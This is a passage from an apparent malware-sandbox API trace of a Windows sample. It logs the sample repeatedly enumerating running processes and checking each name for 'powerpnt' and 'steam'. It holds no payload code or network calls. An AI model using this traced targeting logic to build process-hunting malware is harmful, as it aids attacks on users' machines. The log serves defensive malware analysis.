lpUsedDefaultChar=0x0) returned 12 [0099.058] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b460 [0099.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b460, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.059] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.059] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0099.059] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0099.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.060] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b4f0 [0099.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x357b4f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.060] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0099.060] StrStrIA (lpFirst="dllhost.exe", lpSrch="powerpnt") returned 0x0 [0099.060] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0099.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.061] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357b598 [0099.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357b598, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0099.061] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0099.061] StrStrIA (lpFirst="taskhostw.exe", lpSrch="powerpnt") returned 0x0 [0099.061] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0099.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.063] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357b490 [0099.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x357b490, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0099.063] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0099.063] StrStrIA (lpFirst="UsoClient.exe", lpSrch="powerpnt") returned 0x0 [0099.063] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0099.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.064] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357b478 [0099.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357b478, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0099.064] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0099.064] StrStrIA (lpFirst="taskhostw.exe", lpSrch="powerpnt") returned 0x0 [0099.064] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0099.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0099.082] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357a2d8 [0099.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357a2d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0099.082] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0099.082] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="powerpnt") returned 0x0 [0099.082] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0099.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.083] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a7b8 [0099.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357a7b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0099.083] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0099.084] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="powerpnt") returned 0x0 [0099.084] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0099.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.085] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356bc58 [0099.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356bc58, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0099.085] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0099.085] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="powerpnt") returned 0x0 [0099.085] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.086] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b640 [0099.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x357b640, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.086] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0099.086] StrStrIA (lpFirst="conhost.exe", lpSrch="powerpnt") returned 0x0 [0099.086] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.088] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b4a8 [0099.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x357b4a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.088] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0099.088] StrStrIA (lpFirst="conhost.exe", lpSrch="powerpnt") returned 0x0 [0099.088] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0099.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.089] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b670 [0099.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x357b670, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0099.089] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0099.089] StrStrIA (lpFirst="rxodge.exe", lpSrch="powerpnt") returned 0x0 [0099.089] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0099.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.090] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b688 [0099.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x357b688, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0099.090] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0099.090] StrStrIA (lpFirst="sppsvc.exe", lpSrch="powerpnt") returned 0x0 [0099.090] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0099.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.092] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a858 [0099.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357a858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0099.092] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0099.092] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="powerpnt") returned 0x0 [0099.092] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0099.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.093] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b5b0 [0099.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x357b5b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0099.093] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0099.093] StrStrIA (lpFirst="TiWorker.exe", lpSrch="powerpnt") returned 0x0 [0099.093] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0099.094] CloseHandle (hObject=0x350) returned 1 [0099.094] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0099.122] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.123] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a798 [0099.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357a798, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0099.124] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0099.124] StrStrIA (lpFirst="[System Process]", lpSrch="steam") returned 0x0 [0099.124] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0099.127] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574f40 [0099.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574f40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0099.127] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0099.127] StrStrIA (lpFirst="System", lpSrch="steam") returned 0x0 [0099.127] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.132] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357b4c0 [0099.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x357b4c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0099.132] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0099.132] StrStrIA (lpFirst="smss.exe", lpSrch="steam") returned 0x0 [0099.132] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.134] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b3b8 [0099.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x357b3b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0099.134] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0099.134] StrStrIA (lpFirst="csrss.exe", lpSrch="steam") returned 0x0 [0099.134] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.135] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b3d0 [0099.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x357b3d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0099.135] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0099.135] StrStrIA (lpFirst="wininit.exe", lpSrch="steam") returned 0x0 [0099.135] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.137] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b3e8 [0099.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x357b3e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0099.137] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0099.137] StrStrIA (lpFirst="csrss.exe", lpSrch="steam") returned 0x0 [0099.137] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.138] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b508 [0099.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x357b508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0099.138] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0099.138] StrStrIA (lpFirst="winlogon.exe", lpSrch="steam") returned 0x0 [0099.138] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.140] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b400 [0099.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x357b400, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0099.140] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0099.140] StrStrIA (lpFirst="services.exe", lpSrch="steam") returned 0x0 [0099.140] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.141] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b520 [0099.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x357b520, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0099.141] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0099.141] StrStrIA (lpFirst="lsass.exe", lpSrch="steam") returned 0x0 [0099.141] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: 